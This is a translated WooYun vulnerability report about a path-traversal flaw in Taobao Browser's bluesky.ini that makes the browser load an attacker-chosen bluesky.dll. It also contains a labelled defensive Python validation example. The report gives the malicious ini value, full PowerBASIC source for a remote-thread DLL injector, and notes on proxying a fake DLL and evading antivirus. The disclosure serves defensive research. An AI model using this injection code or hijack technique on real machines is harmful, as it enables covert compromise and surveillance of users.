
Vulnerability summary

Defect ID: wooyun-2013-025715

Title: Taobao Browser 3.0.2.604: modifying a configuration file can lead to local DLL injection

Vendor: Taobao (淘宝网)

Author: blast

Submitted: 2013-06-12 09:33

Fix time: 2013-09-10 09:33

Disclosed: 2013-09-10 09:33

Type: design error / logic flaw

Severity: low

Self-assessed rank: 5

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2013-06-12: details sent to the vendor, awaiting vendor action
2013-06-14: vendor confirmed; details visible to the vendor only
2013-06-17: details opened to third-party security partners
2013-08-08: details opened to core white hats and relevant domain experts
2013-08-18: details opened to regular white hats
2013-08-28: details opened to intern white hats
2013-09-10: details disclosed to the public

Brief description:

In Taobao Browser 3.0.2.604 (2013.3.20), modifying a configuration file can lead to local DLL injection.

Detailed description:

On my home PC, Taobao Browser version 3.0.2.604 (2013.3.20) loads the framework DLL bluesky.dll at startup. The program determines the path of that file from bluesky.ini, so changing the configuration file

\TaoBrowser\bluesky.ini

so that its contents are

[Common]
Version = ../../../../../../../../1111

makes the program load (assuming the install path is c:\taobao\) c:\taobao\..\..\..\..\..\..\..\1111\bluesky.dll at startup, that is, c:\1111\bluesky.dll.
This is of course not limited to this one DLL: after overwriting this DLL, the whole window fails to start. The directory contains many other files, and by checking how they map to features one could overwrite some other DLL so that a malicious trojan is triggered when the user invokes a particular feature (for example AliUpdate.dll for the update feature).
Suppose bluesky.dll is a malicious trojan: once the user opens Taobao Browser, the file is loaded by the browser, and if the antivirus has no signature for it, it is allowed through by default (probably because this is a "white plus black" case, a trusted executable loading an untrusted DLL; the home machine runs 360 antivirus, which gave no prompt even for the injection).
After the DLL is injected it can monitor the user's actions, perform other dangerous operations, etc.
Possible exploitation path: the configuration file could be modified by a trojan that 1. drops a file and 2. modifies a configuration file. Both actions closely resemble normal program behaviour, so they generally would not reach the behaviour score that triggers an antivirus's proactive defence.
As for the forgery part: to forge Alixxx.dll, for example, an attacker could build a fake Alixxx.dll whose export table matches the real one; when the browser calls the fake Alixxx.dll, since the real one is still there, the fake one can call the real Alixxx.dll's functions and return the results to the browser while also running its own code.

Proof of vulnerability:

The DLL loaded into TAOBROWSER.EXE (screenshot: QQ图片20130611231917.jpg)

The injection dialog shown by the DLL (screenshot: QQ图片20130611231926.jpg)

Injection succeeded (-1 = failure, 0 = success) (screenshot: 1233.JPG)

Since this is my mother's machine, no compiler is installed; I temporarily downloaded PowerBASIC and reused code I had written before, so the functionality is crude and only meant as a test:

#COMPILE DLL
#DIM ALL
%USEMACROS = 1
#INCLUDE "D:\PowerBasic\MAINDIR\WinAPI\Win32API.inc"
GLOBAL ghInstance AS DWORD
'-- INJECT.INC --------------------------------------------------------------
DECLARE FUNCTION Get_hModule(BYVAL PID AS DWORD, DllPath$) AS DWORD
DECLARE FUNCTION Inject_DLL(BYVAL PID AS DWORD, DllPath$) AS LONG
DECLARE FUNCTION Eject_DLL(BYVAL PID AS DWORD, BYVAL hModule AS DWORD) AS LONG
'-- Declares not found in WIN32API.INC
DECLARE FUNCTION EnumProcessModules LIB "PSAPI.DLL" ALIAS "EnumProcessModules" _
    (BYVAL hProcess AS DWORD, hModule AS DWORD, _
     BYVAL cb AS DWORD, cbNeeded AS DWORD) AS DWORD
DECLARE FUNCTION GetModuleFileNameEx LIB "PSAPI.DLL" ALIAS "GetModuleFileNameExA" _
    (BYVAL hProcess AS DWORD, BYVAL hModule AS DWORD, _
     Filename AS ASCIIZ, BYVAL nSize AS DWORD) AS DWORD
'====================
FUNCTION Get_hModule(BYVAL PID AS DWORD, DllPath$) AS DWORD
    '-- Returns handle to running module specified in DllPath$, or zero if not found
    '-- PID = process ID of running process; DllPath$ = path+filename of DLL
    REGISTER i&, result&
    LOCAL cb, cbNeeded, nModules AS LONG, hProcess, found, hModules() AS DWORD
    LOCAL dll$, ModuleName AS ASCIIZ * %MAX_PATH
    hProcess = OpenProcess(%PROCESS_QUERY_INFORMATION OR %PROCESS_VM_READ, %FALSE, PID)
    IF hProcess THEN
        cb = 100
        DO
            REDIM hModules(1 TO cb \ 4)
            result = EnumProcessModules(hProcess, hModules(1), cb, cbNeeded)
            IF result = 0 THEN 'call failed
                cbNeeded = 0 : EXIT DO
            END IF
            IF cb > cbNeeded THEN EXIT DO
            cb = cb * 2
        LOOP
        nModules = cbNeeded \ 4
        DLL = UCASE$(DllPath$)
        FOR i = 1 TO nModules
            result = GetModuleFileNameEx(hProcess, hModules(i), _
                                         ModuleName, SIZEOF(ModuleName))
            IF result THEN
                IF UCASE$(RTRIM$(ModuleName,$NUL)) = DLL THEN
                    found = hModules(i) : EXIT FOR
                END IF
            END IF
        NEXT i
        CloseHandle hProcess
    END IF 'hProcess
    FUNCTION = found
END FUNCTION
'====================
FUNCTION Inject_DLL(BYVAL PID AS DWORD, DllPath$) AS LONG
    REGISTER hProcess&, hThread&
    LOCAL ecode&, pLoadLibraryA, pRemoteBuffer AS DWORD
    ecode = -1 'default to error
    hProcess = OpenProcess(%PROCESS_CREATE_THREAD OR %PROCESS_QUERY_INFORMATION OR _
                           %PROCESS_VM_OPERATION OR %PROCESS_VM_READ OR _
                           %PROCESS_VM_WRITE, %FALSE, PID)
    IF hProcess THEN
        pLoadLibraryA = GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA")
        pRemoteBuffer = VirtualAllocEx(hProcess, BYVAL %NULL, LEN(DllPath$), _
                                       %MEM_COMMIT, %PAGE_READWRITE)
        IF pRemoteBuffer AND pLoadLibraryA THEN
            IF WriteProcessMemory(BYVAL hProcess, BYVAL pRemoteBuffer, _
                                  BYVAL STRPTR(DllPath$), LEN(DllPath$), %NULL) THEN
                hThread = CreateRemoteThread(BYVAL hProcess, BYVAL %NULL, 0&, _
                                             BYVAL pLoadLibraryA, BYVAL pRemoteBuffer, _
                                             0, %NULL)
                IF hThread THEN
                    WaitForSingleObject hThread, %INFINITE
                    CloseHandle hThread
                    ecode = 0
                END IF
            END IF
            VirtualFreeEx hProcess, pRemoteBuffer, 0, %MEM_RELEASE
        END IF 'pRemoteBuffer AND pLoadLibraryA
        CloseHandle hProcess
    END IF 'hProcess
    FUNCTION = ecode
END FUNCTION
'====================
FUNCTION Eject_DLL(BYVAL PID AS DWORD, BYVAL hModule AS DWORD) AS LONG
    REGISTER hProcess&, hThread&
    LOCAL ecode&, pFreeLibrary, pRemoteBuffer AS DWORD
    ecode = -1 'default to error
    hProcess = OpenProcess(%PROCESS_CREATE_THREAD OR %PROCESS_QUERY_INFORMATION OR _
                           %PROCESS_VM_OPERATION OR %PROCESS_VM_READ OR _
                           %PROCESS_VM_WRITE, %FALSE, PID)
    IF hProcess THEN
        pFreeLibrary = GetProcAddress(GetModuleHandle("Kernel32"), "FreeLibrary")
        IF pFreeLibrary THEN
            hThread = CreateRemoteThread(BYVAL hProcess, BYVAL %NULL, 0&, _
                                         BYVAL pFreeLibrary, BYVAL hModule, 0, %NULL)
            IF hThread THEN
                WaitForSingleObject hThread, %INFINITE
                CloseHandle hThread
                ecode = 0
            END IF
        END IF
        CloseHandle hProcess
    END IF 'hProcess
    FUNCTION = ecode
END FUNCTION
'-- END INJECT.INC ----------------------------------------------------------
FUNCTION LIBMAIN (BYVAL hInstance AS LONG, _
                  BYVAL fwdReason AS LONG, _
                  BYVAL lpvReserved AS LONG) AS LONG
    DIM sFileName AS ASCIIZ * 256
    DIM sModuleFilePath AS ASCIIZ * %MAX_PATH
    DIM sNameCut AS ASCIIZ * %MAX_PATH

    LOCAL ecode&, hmodule, pid AS DWORD
    LOCAL DllPath$, exepath AS ASCIIZ * %MAX_PATH
    GetModuleFileName GetModuleHandle(""), exepath, SIZEOF(exepath)
    DllPath = "D:\PowerBasic\MAINDIR\t2.dll"
    IF pid = 0 THEN pid = VAL(INPUTBOX$("Enter target process id", DllPath))
    IF pid = 0 THEN EXIT FUNCTION
    hModule = Get_hModule(pid, DllPath)
    IF hModule THEN
        MSGBOX "已被注入,尝试清除中",,DllPath
        ecode = Eject_DLL(pid, hModule)
        MSGBOX "Final eject ecode:" + STR$(ecode),,DllPath
    ELSE
        MSGBOX "未被注入,尝试注入中",,DllPath
        ecode = Inject_DLL(pid, DllPath)
        MSGBOX "Final inject ecode:" + STR$(ecode),,DllPath
    END IF

    ' SELECT CASE fwdReason
    '     CASE %DLL_PROCESS_ATTACH
    '         ghInstance = hInstance
    '         FUNCTION = 1 'success!
    GetModuleFileName(hInstance, sFileName, 255)
    CALL GetModuleFileName( CDWD(&H0), sModuleFilePath, CDWD(%MAX_PATH) )
    ' sNameCut = Parse$( sModuleFilePath, "\", ParseCount(sModuleFilePath, "\") )
    ' sModuleFilePath = RTrim$( sModuleFilePath, sNameCut )
    MSGBOX "The dll" + sFileName + " is being attached into : " + sModuleFilePath
    'FUNCTION = 0 'failure! This will prevent the EXE from running.
    '     CASE %DLL_PROCESS_DETACH
    '         FUNCTION = 1 'success!
    '     CASE %DLL_THREAD_ATTACH
    '         FUNCTION = 1 'success!
    '     CASE %DLL_THREAD_DETACH
    '         FUNCTION = 1 'success!
    ' END SELECT
END FUNCTION


The DLL and the settings (screenshot: 1333.JPG)

Suggested fix:

Properly filter relative-path sequences such as ../ in the configuration value.
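Filtering "../" as suggested is necessary but a substring filter alone is fragile. The following is an added example, not code from the report or from Taobao Browser, showing the check a loader should apply to the bluesky.ini value described above: allowlist the Version string, then canonicalise the resulting DLL path and confirm it stays inside the install directory. It assumes the layout the report implies (install dir, then the Version directory, then bluesky.dll) and the install path c:\taobao from the report.

```python
"""Added example (not from the report): validate the bluesky.ini Version value
before it is used to locate bluesky.dll.
Assumed layout: install_dir / Version / bluesky.dll."""
import configparser
import ntpath  # Windows path rules, so the check behaves the same on any host OS
import re
from typing import Optional

FRAMEWORK_DLL = "bluesky.dll"
# Allowlist: a version directory is a plain name such as 3.0.2.604
# (no path separators, drive letters or UNC prefixes).
_SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]+$")


def resolve_dll_path(install_dir: str, version: str, dll: str = FRAMEWORK_DLL) -> str:
    """The path the loader ends up with (install_dir / version / dll) with '..' collapsed."""
    return ntpath.normpath(ntpath.join(install_dir, version, dll))


def is_within(install_dir: str, candidate: str) -> bool:
    """True only if the canonical candidate lies strictly below install_dir (case-insensitive)."""
    base = ntpath.normcase(ntpath.normpath(install_dir))
    return ntpath.normcase(candidate).startswith(base + ntpath.sep)


def safe_dll_path(install_dir: str, ini_text: str, dll: str = FRAMEWORK_DLL) -> Optional[str]:
    """Return the DLL path to load, or None if the configured Version must be rejected."""
    cfg = configparser.ConfigParser()
    cfg.read_string(ini_text)
    version = cfg.get("Common", "Version", fallback="").strip()
    # First line of defence: the value must look like a version directory name;
    # "." and ".." match the pattern but would escape the directory, so reject them too.
    if not _SAFE_NAME.match(version) or set(version) == {"."}:
        return None
    # Second line of defence: canonicalise and check containment, which also
    # catches anything a plain substring filter for "../" would miss.
    path = resolve_dll_path(install_dir, version, dll)
    return path if is_within(install_dir, path) else None


if __name__ == "__main__":
    # Constructed inputs: the value from the report and a benign one.
    MALICIOUS = "[Common]\nVersion = ../../../../../../../../1111\n"
    BENIGN = "[Common]\nVersion = 3.0.2.604\n"
    print(resolve_dll_path(r"c:\taobao", "../../../../../../../../1111"))  # what the vulnerable loader uses
    print(safe_dll_path(r"c:\taobao", MALICIOUS))  # rejected: None
    print(safe_dll_path(r"c:\taobao", BENIGN))
```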

Copyright notice: please credit the source when reposting: blast@乌云


Vulnerability response

Vendor response:

Severity: medium

Rank: 5

Confirmed: 2013-06-14 11:30

Vendor reply:

Thank you for your support and attention; we are working on fixing this issue ~ ^_^

Latest status:

None yet